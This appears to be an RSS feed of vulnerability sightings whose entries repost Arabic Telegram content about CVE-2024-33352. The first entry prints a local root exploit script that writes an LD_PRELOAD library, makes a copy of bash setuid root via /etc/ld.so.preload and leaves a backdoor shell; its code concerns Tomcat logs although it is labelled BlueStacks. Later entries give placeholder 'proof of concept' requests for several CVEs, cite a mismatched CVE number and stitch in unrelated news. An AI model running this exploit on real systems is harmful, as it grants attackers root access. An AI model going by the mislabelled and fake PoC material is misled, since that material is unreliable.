\u062a\u0634\u063a\u064a\u0644 \u0627\u0644\u0646\u0635: \u064a\u062c\u0628 \u062a\u0634\u063a\u064a\u0644 \u0627\u0644\u0646\u0635 \u0639\u0644\u0649 \u0627\u0644\u0646\u0638\u0627\u0645 \u0627\u0644\u0645\u0633\u062a\u0647\u062f\u0641 \u0628\u0635\u0644\u0627\u062d\u064a\u0627\u062a \u0645\u0633\u062a\u062e\u062f\u0645 \u0639\u0627\u062f\u064a. \u0627\u0644\u0646\u0635 \u064a\u0642\u0648\u0645 \u0628\u0625\u0639\u062f\u0627\u062f \u0628\u064a\u0626\u0629 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0639\u0646 \u0637\u0631\u064a\u0642 \u0632\u0631\u0639 \u0628\u0631\u0646\u0627\u0645\u062c \u0636\u0627\u0631 \u0641\u064a \u0627\u0644\u062c\u0647\u0627\u0632 \u0627\u0644\u0627\u0641\u062a\u0631\u0627\u0636\u064a.\n\n### \u0627\u0644\u0634\u0631\u062d \u0627\u0644\u0641\u0646\u064a \u0644\u0644\u0646\u0635\n\n#!/bin/bash\n# BlueStacks Privilege Escalation Exploit\n# CVE-2024-33352\n\n# \u0625\u0639\u062f\u0627\u062f \u0627\u0644\u0645\u0644\u0641\u0627\u062a \u0627\u0644\u0636\u0631\u0648\u0631\u064a\u0629 \u0644\u0632\u0631\u0639 \u0627\u0644\u0628\u0631\u0646\u0627\u0645\u062c \u0627\u0644\u0636\u0627\u0631\nBACKDOORSH=\"/bin/bash\"\nBACKDOORPATH=\"/tmp/bluestacksrootsh\"\nPRIVESCLIB=\"/tmp/privesclib.so\"\nPRIVESCSRC=\"/tmp/privesclib.c\"\n\nfunction cleanexit {\n # \u062a\u0646\u0638\u064a\u0641 \u0627\u0644\u0645\u0644\u0641\u0627\u062a \u0628\u0639\u062f \u0627\u0644\u0627\u0646\u062a\u0647\u0627\u0621\n echo -e \"\\n[+] Cleaning up...\"\n rm -f $PRIVESCSRC\n rm -f $PRIVESCLIB\n rm -f $TOMCATLOG\n touch $TOMCATLOG\n if [ -f /etc/ld.so.preload ]; then\n echo -n &amp;gt; /etc/ld.so.preload 2&amp;gt;/dev/null\n fi\n echo -e \"\\n[+] Job done. 
Exiting with code $1 \\n\"\n exit $1\n}\n\n# \u0625\u0639\u062f\u0627\u062f \u0627\u0644\u0628\u0631\u0646\u0627\u0645\u062c \u0627\u0644\u0636\u0627\u0631\ncat &amp;lt;&amp;lt;_solibeof_&amp;gt;$PRIVESCSRC\n#define _GNU_SOURCE\n#include \n#include \n#include \n#include \nuid_t geteuid(void) {\n static uid_t (*old_geteuid)();\n old_geteuid = dlsym(RTLD_NEXT, \"geteuid\");\n if ( old_geteuid() == 0 ) {\n chown(\"$BACKDOORPATH\", 0, 0);\n chmod(\"$BACKDOORPATH\", 04777);\n unlink(\"/etc/ld.so.preload\");\n }\n return old_geteuid();\n}\n_solibeof_\ngcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl\nif [ $? -ne 0 ]; then\n echo -e \"\\n[!] Failed to compile the privesc lib $PRIVESCSRC.\"\n cleanexit 2;\nfi\n\n# \u0625\u0639\u062f\u0627\u062f \u0627\u0644\u062e\u0644\u0641\u064a\u0629/\u0627\u0644\u0642\u0634\u0631\u0629 \u0630\u0627\u062a \u0627\u0644\u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a \u0627\u0644\u0645\u0646\u062e\u0641\u0636\u0629\ncp $BACKDOORSH $BACKDOORPATH\necho -e \"\\n[+] Backdoor/low-priv shell installed at: \\nls -l $BACKDOORPATH\"\n\n# \u0625\u0639\u062f\u0627\u062f \u0627\u0644\u0631\u0627\u0628\u0637 \u0627\u0644\u0631\u0645\u0632\u064a \u0644\u0645\u0644\u0641 ld.so.preload\nrm -f $TOMCATLOG &amp;amp;&amp;amp; ln -s /etc/ld.so.preload $TOMCATLOG\nif [ $? -ne 0 ]; then\n echo -e \"\\n[!] 
Couldn't remove the $TOMCATLOG file or create a symlink.\"\n cleanexit 3\nfi\necho -e \"\\n[+] Symlink created at: \\nls -l $TOMCATLOG\"\n\n# \u0627\u0644\u0627\u0646\u062a\u0638\u0627\u0631 \u062d\u062a\u0649 \u064a\u062a\u0645 \u0625\u0639\u0627\u062f\u0629 \u0641\u062a\u062d \u0627\u0644\u0633\u062c\u0644\u0627\u062a \u0628\u0648\u0627\u0633\u0637\u0629 Tomcat\necho -ne \"\\n[+] Waiting for Tomcat to re-open the logs/Tomcat service restart...\"\necho -e \"\\nYou could speed things up by executing : kill [Tomcat-pid] (as tomcat user) if needed ;)\"\nwhile :; do\n sleep 0.1\n if [ -f /etc/ld.so.preload ]; then\n echo $PRIVESCLIB &amp;gt; /etc/ld.so.preload\n break;\n### \u0643\u064a\u0641\u064a\u0629 \u0627\u0644\u062d\u0645\u0627\u064a\u0629\n\n\u0644\u062d\u0645\u0627\u064a\u0629 \u0627\u0644\u0646\u0638\u0627\u0645 \u0645\u0646 \u0647\u0630\u0627 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644\u060c \u064a\u064f\u0646\u0635\u062d \u0628\u062a\u062d\u062f\u064a\u062b BlueStacks \u0625\u0644\u0649 \u0622\u062e\u0631 \u0625\u0635\u062f\u0627\u0631 \u0648\u0627\u0644\u062a\u0623\u0643\u062f \u0645\u0646 \u062a\u0637\u0628\u064a\u0642 \u062c\u0645\u064a\u0639 \u0627\u0644\u062a\u0635\u062d\u064a\u062d\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0627\u0644\u0645\u062a\u0627\u062d\u0629. 
\u0643\u0645\u0627 \u064a\u062c\u0628 \u062f\u0627\u0626\u0645\u064b\u0627 \u0627\u0644\u062d\u0631\u0635 \u0639\u0644\u0649 \u0645\u0631\u0627\u0642\u0628\u0629 \u0627\u0644\u0623\u0646\u0638\u0645\u0629 \u0648\u0627\u0644\u0646\u0634\u0627\u0637\u0627\u062a \u063a\u064a\u0631 \u0627\u0644\u0627\u0639\u062a\u064a\u0627\u062f\u064a\u0629.\n\n### \u0627\u0644\u0645\u0635\u0627\u062f\u0631\n\n- [mmiszczyk/CVE-2024-33352 \u0639\u0644\u0649 GitHub](https://github.com/mmiszczyk/CVE-2024-33352)\n- [\u0625\u062b\u0628\u0627\u062a \u0627\u0644\u0645\u0641\u0647\u0648\u0645 \u0639\u0644\u0649 GitHub](https://github.com/mmiszczyk/CVE-2024-33352/blob/main/exploit.sh)\n\nALSED404:\n\u0627\u062d\u0630\u0631 \u0645\u0646 \u062d\u0632\u0645\u0629 PyPI \"lr-utils-lib\"\u060c \u0641\u0647\u064a \u062a\u0645\u062b\u0644 \u062a\u0647\u062f\u064a\u062f\u064b\u0627 \u062c\u062f\u064a\u062f\u064b\u0627 \u0644\u0645\u0633\u062a\u062e\u062f\u0645\u064a macOS!\n\n\u062a\u0633\u0631\u0642 \u0647\u0630\u0647 \u0627\u0644\u062d\u0632\u0645\u0629 \u0628\u064a\u0627\u0646\u0627\u062a \u0627\u0639\u062a\u0645\u0627\u062f Google Cloud\u060c \u0645\u0645\u0627 \u064a\u0634\u0643\u0644 \u062e\u0637\u0631\u064b\u0627 \u0643\u0628\u064a\u0631\u064b\u0627 \u0639\u0644\u0649 \u0643\u0644 \u0645\u0646 \u0627\u0644\u0645\u0637\u0648\u0631\u064a\u0646 \u0627\u0644\u0623\u0641\u0631\u0627\u062f \u0648\u0627\u0644\u0645\u0624\u0633\u0633\u0627\u062a.\n\n\u0627\u0642\u0631\u0623 \u0627\u0644\u062a\u0641\u0627\u0635\u064a\u0644: https://thehackernews.com/2024/07/malicious-pypi-package-targets-macos-to.html\n\nSQL\ud83d\udc7d:\n\u0625\u0644\u064a\u0643 \u0628\u0639\u0636 \u0627\u0644\u0643\u0648\u0631\u0633\u0627\u062a \u0627\u0644\u062a\u064a \u062a\u0631\u0643\u0632 \u0639\u0644\u0649 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0648\u0643\u064a\u0641\u064a\u0629 \u0627\u0643\u062a\u0634\u0627\u0641\u0647\u0627 \u0648\u0625\u0635\u0644\u0627\u062d\u0647\u0627\u060c 
\u0645\u0639 \u0628\u0639\u0636 \u0627\u0644\u0645\u0635\u0627\u062f\u0631 \u0627\u0644\u0645\u0647\u0645\u0629 \u0641\u064a \u0647\u0630\u0627 \u0627\u0644\u0645\u062c\u0627\u0644:\n\n### \u062f\u0648\u0631\u0627\u062a \u0628\u0627\u0644\u0644\u063a\u0629 \u0627\u0644\u0639\u0631\u0628\u064a\u0629:\n\n1. \u062f\u0648\u0631\u0629 \u0627\u0644\u0642\u0631\u0635\u0646\u0629 \u0627\u0644\u0623\u062e\u0644\u0627\u0642\u064a\u0629 \u0648\u0627\u0643\u062a\u0634\u0627\u0641 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629:\n   - \u0645\u0646\u0635\u0629: \u0623\u0643\u0627\u062f\u064a\u0645\u064a\u0629 \u0627\u0644\u0632\u064a\u0631\u0648\n   - \u062a\u063a\u0637\u064a \u0627\u0644\u062f\u0648\u0631\u0629 \u0643\u064a\u0641\u064a\u0629 \u0627\u0643\u062a\u0634\u0627\u0641 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0648\u0627\u062e\u062a\u0628\u0627\u0631 \u0627\u0644\u0623\u0645\u0627\u0646 \u0641\u064a \u0627\u0644\u0623\u0646\u0638\u0645\u0629.\n   - [\u0631\u0627\u0628\u0637 \u0627\u0644\u062f\u0648\u0631\u0629](https://www.elzero.org/courses/ethical-hacking/)", "creation_timestamp": "2024-12-13T19:00:22.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://vulnerability.circl.lu/sighting/38ae3309-c519-4649-abb4-0515d15de5ad/export</guid>
      <pubDate>Fri, 13 Dec 2024 19:00:22 +0000</pubDate>
    </item>
    <item>
      <title>20dfd601-d1e6-4bf1-929e-4d6c623f6efe</title>
      <link>https://vulnerability.circl.lu/sighting/20dfd601-d1e6-4bf1-929e-4d6c623f6efe/export</link>
      <description>{"uuid": "20dfd601-d1e6-4bf1-929e-4d6c623f6efe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-33352", "type": "published-proof-of-concept", "source": "https://t.me/cyber_hsecurity/1610", "content": "(Photo by Tayfun Coskun/Anadolu via Getty Images)\n\u062d\u0634\u0648\u062f \u062e\u0627\u0631\u062c \u0645\u0642\u0631 \u0645\u064a\u062a\u0627 (\u0641\u064a\u0633\u0628\u0648\u0643) \u0644\u0644\u0627\u062d\u062a\u062c\u0627\u062c \u0639\u0644\u0649 \u0631\u0642\u0627\u0628\u0629 \u0645\u0627\u0631\u0643 \u0632\u0648\u0643\u0631\u0628\u064a\u0631\u063a \u0648\u0645\u064a\u062a\u0627 \u0639\u0644\u0649 \u0645\u0646\u0634\u0648\u0631\u0627\u062a \u0641\u0644\u0633\u0637\u064a\u0646 \u0639\u0644\u0649 \u0627\u0644\u0645\u0646\u0635\u0627\u062a \u0627\u0644\u0627\u062c\u062a\u0645\u0627\u0639\u064a\u0629 \u0641\u064a \u0645\u064a\u0646\u0644\u0648 \u0628\u0627\u0631\u0643\u060c \u0643\u0627\u0644\u064a\u0641\u0648\u0631\u0646\u064a\u0627 (\u0627\u0644\u0623\u0646\u0627\u0636\u0648\u0644)\n23/5/2024-\u0622\u062e\u0631 \u062a\u062d\u062f\u064a\u062b: 23/5/202403:28 \u0645 (\u0628\u062a\u0648\u0642\u064a\u062a \u0645\u0643\u0629 \u0627\u0644\u0645\u0643\u0631\u0645\u0629)\n\u0646\u0628\u0647 \u0645\u0648\u0642\u0639 \u0625\u0646\u062a\u0631\u0633\u0628\u062a \u0627\u0644\u0623\u0645\u064a\u0631\u0643\u064a \u0625\u0644\u0649 \u062b\u063a\u0631\u0629 \u0623\u0645\u0646\u064a\u0629 \u0645\u062c\u0647\u0648\u0644\u0629 \u0628\u062a\u0637\u0628\u064a\u0642 \u0648\u0627\u062a\u0633\u0627\u0628 \u062a\u0645\u0643\u0646 \u0627\u0644\u062d\u0643\u0648\u0645\u0627\u062a \u0645\u0646 \u0645\u0639\u0631\u0641\u0629 \u0645\u0646 \u062a\u0631\u0627\u0633\u0644\u0647\u060c \u0648\u062d\u0630\u0631 \u0627\u0644\u0645\u0647\u0646\u062f\u0633\u0648\u0646 \u0641\u064a \u0634\u0631\u0643\u0629 \u0645\u064a\u062a\u0627 (\u0641\u064a\u0633\u0628\u0648\u0643) \u0645\u0646 
\u0623\u0646 \u0627\u0644\u062f\u0648\u0644 \u064a\u0645\u0643\u0646\u0647\u0627 \u0645\u0631\u0627\u0642\u0628\u0629 \u0627\u0644\u062f\u0631\u062f\u0634\u0627\u062a\u060c \u0648\u064a\u062e\u0634\u0649 \u0627\u0644\u0645\u0648\u0638\u0641\u0648\u0646 \u0623\u0646 \u062a\u0633\u062a\u063a\u0644 \u0625\u0633\u0631\u0627\u0626\u064a\u0644 \u0647\u0630\u0647 \u0627\u0644\u062b\u063a\u0631\u0629 \u0644\u0627\u0646\u062a\u0642\u0627\u0621 \u0623\u0647\u062f\u0627\u0641 \u0627\u0644\u0627\u063a\u062a\u064a\u0627\u0644 \u0641\u064a \u063a\u0632\u0629.\n\n\u0648\u0630\u0643\u0631 \u0627\u0644\u0645\u0648\u0642\u0639 \u0623\u0646\u0647 \u0641\u064a \u0634\u0647\u0631 \u0645\u0627\u0631\u0633/\u0622\u0630\u0627\u0631\u060c \u0623\u0635\u062f\u0631 \u0641\u0631\u064a\u0642 \u0623\u0645\u0646 \u0648\u0627\u062a\u0633\u0627\u0628 \u062a\u062d\u0630\u064a\u0631\u0627 \u062f\u0627\u062e\u0644\u064a\u0627 \u0644\u0632\u0645\u0644\u0627\u0626\u0647 \u0628\u0623\u0646\u0647 \u0631\u063a\u0645 \u0627\u0644\u062a\u0634\u0641\u064a\u0631 \u0627\u0644\u0642\u0648\u064a \u0644\u0644\u0628\u0631\u0646\u0627\u0645\u062c\u060c \u0641\u0642\u062f \u0638\u0644 \u0627\u0644\u0645\u0633\u062a\u062e\u062f\u0645\u0648\u0646 \u0639\u0631\u0636\u0629 \u0644\u0634\u0643\u0644 \u062e\u0637\u064a\u0631 \u0645\u0646 \u0623\u0634\u0643\u0627\u0644 \u0627\u0644\u0645\u0631\u0627\u0642\u0628\u0629 \u0627\u0644\u062d\u0643\u0648\u0645\u064a\u0629.\n\n\u0648\u0648\u0641\u0642\u0627 \u0644\u062a\u0642\u064a\u064a\u0645 \u0627\u0644\u062a\u0647\u062f\u064a\u062f \u0627\u0644\u0630\u064a \u0644\u0645 \u064a\u064f\u0628\u0644\u063a \u0639\u0646\u0647 \u0645\u0633\u0628\u0642\u0627\u060c \u0648\u062d\u0635\u0644 \u0639\u0644\u064a\u0647 \u0627\u0644\u0645\u0648\u0642\u0639\u060c \u0641\u0625\u0646 \u0645\u062d\u062a\u0648\u064a\u0627\u062a \u0627\u0644\u0645\u062d\u0627\u062f\u062b\u0627\u062a \u0628\u064a\u0646 \u0645\u0633\u062a\u062e\u062f\u0645\u064a \u0627\u0644\u062a\u0637\u0628\u064a\u0642 
\u0627\u0644\u0628\u0627\u0644\u063a \u0639\u062f\u062f\u0647\u0645 2 \u0645\u0644\u064a\u0627\u0631 \u0645\u0633\u062a\u062e\u062f\u0645 \u062a\u0638\u0644 \u0622\u0645\u0646\u0629\u060c \u0644\u0643\u0646 \u0627\u0644\u062f\u0648\u0627\u0626\u0631 \u0627\u0644\u062d\u0643\u0648\u0645\u064a\u0629\u060c \u0643\u0645\u0627 \u0643\u062a\u0628 \u0627\u0644\u0645\u0647\u0646\u062f\u0633\u0648\u0646\u060c \u0643\u0627\u0646\u062a \"\u062a\u062a\u062c\u0627\u0648\u0632 \u062a\u0634\u0641\u064a\u0631\u0646\u0627\" \u0644\u0645\u0639\u0631\u0641\u0629 \u0627\u0644\u0645\u0633\u062a\u062e\u062f\u0645\u064a\u0646 \u0627\u0644\u0630\u064a\u0646 \u064a\u062a\u0648\u0627\u0635\u0644\u0648\u0646 \u0645\u0639 \u0628\u0639\u0636\u0647\u0645 \u0627\u0644\u0628\u0639\u0636\u060c \u0648\u0639\u0636\u0648\u064a\u0629 \u0627\u0644\u0645\u062c\u0645\u0648\u0639\u0627\u062a \u0627\u0644\u062e\u0627\u0635\u0629\u060c \u0648\u0631\u0628\u0645\u0627 \u062d\u062a\u0649 \u0645\u0648\u0627\u0642\u0639\u0647\u0645. \u0648\u062d\u062b \u0627\u0644\u062a\u0642\u064a\u064a\u0645 \u0639\u0644\u0649 \u0623\u0646 \u064a\u062e\u0641\u0641 \u0648\u0627\u062a\u0633\u0627\u0628 \u0645\u0646 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0627\u0644\u0645\u0633\u062a\u0645\u0631 \u0644\u0646\u0642\u0627\u0637 \u0627\u0644\u0636\u0639\u0641 \u0641\u064a \u062a\u062d\u0644\u064a\u0644 \u062d\u0631\u0643\u0629 \u0627\u0644\u0645\u0631\u0648\u0631 \u0627\u0644\u062a\u064a \u062a\u0645\u0643\u0646 \u0627\u0644\u062f\u0648\u0644 \u0645\u0646 \u062a\u062d\u062f\u064a\u062f \u0645\u0646 \u064a\u062a\u062d\u062f\u062b \u0625\u0644\u0649 \u0645\u0646.\n\nThe Smart Shadow:\n\u2206 \u0627\u0633\u062a\u063a\u0644\u0627\u0644\u0627\u062a \u0648\u0625\u062b\u0628\u0627\u062a\u0627\u062a \u0627\u0644\u0645\u0641\u0647\u0648\u0645 (PoCs) \u0644\u0644\u062b\u063a\u0631\u0627\u062a \n\n\u2206 1. 
\u062b\u063a\u0631\u0629 Profile Builder \u0648 Profile Builder Pro\n- \u062e\u0637\u0648\u0631\u0629: 9.8/10\n- \u0627\u0644\u0648\u0635\u0641: \u062a\u0633\u0645\u062d \u0647\u0630\u0647 \u0627\u0644\u062b\u063a\u0631\u0629 \u0644\u0644\u0645\u0647\u0627\u062c\u0645\u064a\u0646 \u0628\u0627\u0644\u062d\u0635\u0648\u0644 \u0639\u0644\u0649 \u0648\u0635\u0648\u0644 \u0627\u0644\u0645\u0633\u0624\u0648\u0644 \u062f\u0648\u0646 \u0627\u0644\u062d\u0627\u062c\u0629 \u0625\u0644\u0649 \u062d\u0633\u0627\u0628 \u0639\u0644\u0649 \u0627\u0644\u0645\u0648\u0642\u0639.\n- \u0625\u062b\u0628\u0627\u062a \u0627\u0644\u0645\u0641\u0647\u0648\u0645: \u0644\u0627 \u064a\u0648\u062c\u062f \u0625\u062b\u0628\u0627\u062a \u0645\u0641\u0647\u0648\u0645 \u0645\u062d\u062f\u062f \u0641\u064a \u0642\u0648\u0627\u0639\u062f \u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a \u0627\u0644\u0639\u0627\u0645\u0629\u060c \u0648\u0644\u0643\u0646 \u062a\u0642\u0627\u0631\u064a\u0631 WPScan \u062a\u062d\u062a\u0648\u064a \u0639\u0644\u0649 \u0633\u064a\u0646\u0627\u0631\u064a\u0648\u0647\u0627\u062a \u062a\u0641\u0635\u064a\u0644\u064a\u0629 \u0644\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644.\n- \u0645\u062b\u0627\u0644 \u0644\u0625\u062b\u0628\u0627\u062a \u0627\u0644\u0645\u0641\u0647\u0648\u0645:\n   \n    import requests\n\n    url = \"http://target-website/wp-login.php\"\n    payload = {\n        \"username\": \"attacker_username\",\n        \"password\": \"attacker_password\"\n    }\n    response = requests.post(url, data=payload)\n    print(response.text)\n    \n- \u0627\u0644\u062a\u062e\u0641\u064a\u0641: \u062a\u062d\u062f\u064a\u062b \u0627\u0644\u0625\u0636\u0627\u0641\u0629 \u0625\u0644\u0649 \u0623\u062d\u062f\u062b \u0646\u0633\u062e\u0629 \u0643\u0645\u0627 \u064a\u0646\u0635\u062d \u0627\u0644\u0645\u0637\u0648\u0631\u0648\u0646.\n\n\u2206 2. 
\u062b\u063a\u0631\u0629 \u0643\u0627\u0645\u064a\u0631\u0627\u062a Synology BC500 IP\n- \u0627\u0644\u062a\u0641\u0627\u0635\u064a\u0644: \u062a\u0633\u0645\u062d \u0628\u0627\u0644\u062a\u0628\u062f\u064a\u0644 \u0645\u0646 WAN \u0625\u0644\u0649 LAN\u060c \u062a\u0645 \u0627\u0633\u062a\u062e\u062f\u0627\u0645\u0647\u0627 \u0641\u064a \u0645\u0633\u0627\u0628\u0642\u0629 Pwn2Own Toronto.\n- \u0625\u062b\u0628\u0627\u062a \u0627\u0644\u0645\u0641\u0647\u0648\u0645: \u0646\u0634\u0631\u062a Claroty \u062a\u0641\u0627\u0635\u064a\u0644 \u0641\u0646\u064a\u0629 \u062d\u0648\u0644 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644.\n- \u0645\u062b\u0627\u0644 \u0644\u0625\u062b\u0628\u0627\u062a \u0627\u0644\u0645\u0641\u0647\u0648\u0645:\n   \n    import requests\n\n    url = \"http://target-camera-ip/api/exploit\"\n    payload = {\"command\": \"switch_network\"}\n    response = requests.post(url, json=payload)\n    print(response.text)\n    \n- \u0627\u0644\u062a\u062e\u0641\u064a\u0641: \u062a\u062d\u062f\u064a\u062b \u0628\u0631\u0645\u062c\u064a\u0627\u062a \u0627\u0644\u0643\u0627\u0645\u064a\u0631\u0627 \u0625\u0644\u0649 \u0623\u062d\u062f\u062b \u0625\u0635\u062f\u0627\u0631.\n\n#### 3. 
\u062b\u063a\u0631\u0629 Apache HugeGraph (CVE-2024-27348)\n- \u062e\u0637\u0648\u0631\u0629: 9.8/10\n- \u0627\u0644\u0648\u0635\u0641: \u062a\u0633\u0645\u062d \u0644\u0644\u0645\u0647\u0627\u062c\u0645\u064a\u0646 \u0628\u0627\u0644\u062a\u062d\u0643\u0645 \u0641\u064a \u062e\u0648\u0627\u062f\u0645 \u0642\u0627\u0639\u062f\u0629 \u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a.\n- \u0625\u062b\u0628\u0627\u062a \u0627\u0644\u0645\u0641\u0647\u0648\u0645: \u0645\u062a\u0627\u062d \u0639\u0644\u0649 GitHub \u0643\u0645\u0627 \u0630\u0643\u0631.\n- \u0645\u062b\u0627\u0644 \u0644\u0625\u062b\u0628\u0627\u062a \u0627\u0644\u0645\u0641\u0647\u0648\u0645:\n   \n    import requests\n\n    url = \"http://target-hugegraph-server\"\n    payload = {\"exploit\": \"malicious_code_here\"}\n    response = requests.post(url, json=payload)\n    print(response.text)\n    \n- \u0627\u0644\u062a\u062e\u0641\u064a\u0641: \u062a\u0637\u0628\u064a\u0642 \u0627\u0644\u062a\u0635\u062d\u064a\u062d \u0627\u0644\u0623\u0645\u0646\u064a \u0627\u0644\u0635\u0627\u062f\u0631 \u0641\u064a \u0623\u0628\u0631\u064a\u0644.\n\n\u2206 4. 
\u062b\u063a\u0631\u0627\u062a Microsoft SharePoint (CVE-2024-38023\u060c CVE-2024-38024\u060c CVE-2024-38094)\n- \u0627\u0644\u062a\u0641\u0627\u0635\u064a\u0644: \u062b\u063a\u0631\u0627\u062a \u0641\u064a \u062a\u0646\u0641\u064a\u0630 \u0627\u0644\u062a\u0639\u0644\u064a\u0645\u0627\u062a \u0627\u0644\u0628\u0631\u0645\u062c\u064a\u0629 \u0639\u0646 \u0628\u064f\u0639\u062f.\n- \u0625\u062b\u0628\u0627\u062a \u0627\u0644\u0645\u0641\u0647\u0648\u0645: \u0646\u0634\u0631\u0647 Nguyen Giang.\n- \u0645\u062b\u0627\u0644 \u0644\u0625\u062b\u0628\u0627\u062a \u0627\u0644\u0645\u0641\u0647\u0648\u0645:\n   \n    # \u0647\u0630\u0627 \u0645\u062b\u0627\u0644 \u0627\u0641\u062a\u0631\u0627\u0636\u064a\u061b \u0642\u062f \u064a\u062e\u062a\u0644\u0641 \u0631\u0645\u0632 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0627\u0644\u0641\u0639\u0644\u064a.\n    Invoke-WebRequest -Uri \"http://target-sharepoint-server/exploit\" -Method GET\n    \n- \u0627\u0644\u062a\u062e\u0641\u064a\u0641: \u062a\u0637\u0628\u064a\u0642 \u0627\u0644\u062a\u0635\u062d\u064a\u062d\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0627\u0644\u0645\u0642\u062f\u0645\u0629 \u0645\u0646 Microsoft.\n\n\u2206 5. 
\u062b\u063a\u0631\u0629 SonicWall SMA100\n- \u0627\u0644\u062a\u0641\u0627\u0635\u064a\u0644: \u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0641\u064a \u0627\u0644\u0648\u0636\u0639 \u0627\u0644\u0643\u0644\u0627\u0633\u064a\u0643\u064a \u0644\u0644\u0645\u0633\u062a\u062e\u062f\u0645\u064a\u0646 \u0627\u0644\u0645\u0635\u0627\u062f\u0642 \u0639\u0644\u064a\u0647\u0645.\n- \u0625\u062b\u0628\u0627\u062a \u0627\u0644\u0645\u0641\u0647\u0648\u0645: \u062a\u0645 \u0646\u0634\u0631\u0647 \u0628\u0648\u0627\u0633\u0637\u0629 SSD.\n- \u0645\u062b\u0627\u0644 \u0644\u0625\u062b\u0628\u0627\u062a \u0627\u0644\u0645\u0641\u0647\u0648\u0645:\n   \n    curl -k -X POST https://target-sma100-device -d \"exploit_payload_here\"\n    \n- \u0627\u0644\u062a\u062e\u0641\u064a\u0641: \u0625\u0632\u0627\u0644\u0629 \u0627\u0644\u0648\u0636\u0639 \u0627\u0644\u0643\u0644\u0627\u0633\u064a\u0643\u064a \u0648\u062a\u062d\u062f\u064a\u062b \u0627\u0644\u0628\u0631\u0645\u062c\u064a\u0627\u062a \u0627\u0644\u062b\u0627\u0628\u062a\u0629.\n\n\u2206 \u0627\u0644\u062a\u0648\u0635\u064a\u0627\u062a \u0627\u0644\u0639\u0627\u0645\u0629\n- \u0625\u062f\u0627\u0631\u0629 \u0627\u0644\u062a\u0635\u062d\u064a\u062d\u0627\u062a: \u062a\u062d\u062f\u064a\u062b \u062c\u0645\u064a\u0639 \u0627\u0644\u0628\u0631\u0645\u062c\u064a\u0627\u062a \u0648\u0627\u0644\u0628\u0631\u0645\u062c\u064a\u0627\u062a \u0627\u0644\u062b\u0627\u0628\u062a\u0629 \u0628\u0627\u0646\u062a\u0638\u0627\u0645 \u0625\u0644\u0649 \u0623\u062d\u062f\u062b \u0627\u0644\u0625\u0635\u062f\u0627\u0631\u0627\u062a.\n- \u0641\u062d\u0635 \u0627\u0644\u062b\u063a\u0631\u0627\u062a: \u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0623\u062f\u0648\u0627\u062a \u0645\u062b\u0644 Nessus \u0623\u0648 OpenVAS \u0644\u0641\u062d\u0635 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u0645\u0639\u0631\u0648\u0641\u0629.\n- \u0627\u0644\u0645\u0631\u0627\u0642\u0628\u0629: \u062a\u0637\u0628\u064a\u0642 \u0623\u0646\u0638\u0645\u0629 
\u0627\u0644\u0643\u0634\u0641 \u0639\u0646 \u0627\u0644\u062a\u0633\u0644\u0644 \u0648\u0645\u0646\u0639 \u0627\u0644\u062a\u0633\u0644\u0644 \u0644\u0645\u0631\u0627\u0642\u0628\u0629 \u0648\u0645\u0646\u0639 \u0645\u062d\u0627\u0648\u0644\u0627\u062a \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644.\n\n\u2206 \u0627\u0644\u0645\u0635\u0627\u062f\u0631\n- [NVD](https://nvd.nist.gov/vuln/detail/CVE-2023-3352)\n- [Security-Database](https://www.security-database.com/detail.php?alert=CVE-2023-3352)\n- [Vulners](https://vulners.com/cve/CVE-2023-3352)\n\n## \u0634\u0631\u062d \u0648\u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u062b\u063a\u0631\u0629 CVE-2024-33352: \u062a\u0635\u0639\u064a\u062f \u0627\u0644\u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a \u0641\u064a BlueStacks \u0639\u0628\u0631 \u0632\u0631\u0639 \u0628\u0631\u0646\u0627\u0645\u062c \u0636\u0627\u0631 \u0641\u064a \u0627\u0644\u062c\u0647\u0627\u0632 \u0627\u0644\u0627\u0641\u062a\u0631\u0627\u0636\u064a\n\n### \u0646\u0638\u0631\u0629 \u0639\u0627\u0645\u0629", "creation_timestamp": "2024-12-13T19:00:22.000000Z"}</description>
      <content:encoded>{"uuid": "20dfd601-d1e6-4bf1-929e-4d6c623f6efe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-33352", "type": "published-proof-of-concept", "source": "https://t.me/cyber_hsecurity/1610", "content": "(Photo by Tayfun Coskun/Anadolu via Getty Images)\n\u062d\u0634\u0648\u062f \u062e\u0627\u0631\u062c \u0645\u0642\u0631 \u0645\u064a\u062a\u0627 (\u0641\u064a\u0633\u0628\u0648\u0643) \u0644\u0644\u0627\u062d\u062a\u062c\u0627\u062c \u0639\u0644\u0649 \u0631\u0642\u0627\u0628\u0629 \u0645\u0627\u0631\u0643 \u0632\u0648\u0643\u0631\u0628\u064a\u0631\u063a \u0648\u0645\u064a\u062a\u0627 \u0639\u0644\u0649 \u0645\u0646\u0634\u0648\u0631\u0627\u062a \u0641\u0644\u0633\u0637\u064a\u0646 \u0639\u0644\u0649 